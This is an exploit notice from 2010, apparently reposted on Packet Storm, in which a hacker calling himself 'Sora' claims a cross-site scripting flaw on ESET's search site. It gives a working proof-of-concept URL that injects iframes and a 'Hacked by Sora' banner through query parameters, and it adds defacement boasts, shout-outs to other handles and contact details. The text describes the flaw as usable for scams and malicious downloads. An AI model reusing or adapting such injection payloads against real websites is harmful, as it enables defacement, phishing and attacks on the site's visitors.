ESET.com suffers from a cross site scripting vulnerability.
c89397c70db52686ce763e21e2937dabd8affe7a8b6fc849308fcf0774f69bd6___________ _______________________________
\_ _____// _____/\_ _____/\__ ___/
| __)_ \_____ \ | __)_ | |
| \/ \ | \ | | http://www.eset.com/
|
/_______ /_______ //_______ / |____|
\/ \/ \/ > Cross Site Scripting Exploit
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: http://greyhathackers.wordpress.com/
> Vulnerability: Cross Site Scripting
————————-
1. INFORMATION |
————————-
Site: http://search.eset.com/
Vulnerability: Cross Site Scripting
Vulnerability Level: 3
————————-
2. DESCRIPTION |
————————-
http;//search.eset.com/ suffers a remote cross site scripting exploit, which can be used to
scam information and to execute malicious javascript which might remotely download a file to the
victim’s PC.
————————-
3. PROOF OF CONCEPT |
————————-
http://search.eset.com/esetsite/index?page=answers&type=%3Ciframe%20src=%22www.google.ca%22%3E&question_box=%3Ch2%3EHacked%20by%20Sora%20-%20vhr95zw%20[at]%20hotmail%20[dot]%20com%20-%20greyhathackers.blogspot.com%3C/h2%3E%3Ciframe%20src=%22www.xssed.com%22%3E&ichbox[]=en-US
Pretty much owned? >:D
————————-
4. GREETZ |
————————-
# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes #
————————-
5. CONTACT |
————————-
Have any questions? Send me a mail or add me on MSN: vhr95zw [at] hotmail [dot] com
<c> 2010 – http://greyhathackers.wordpress.com – Sora
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed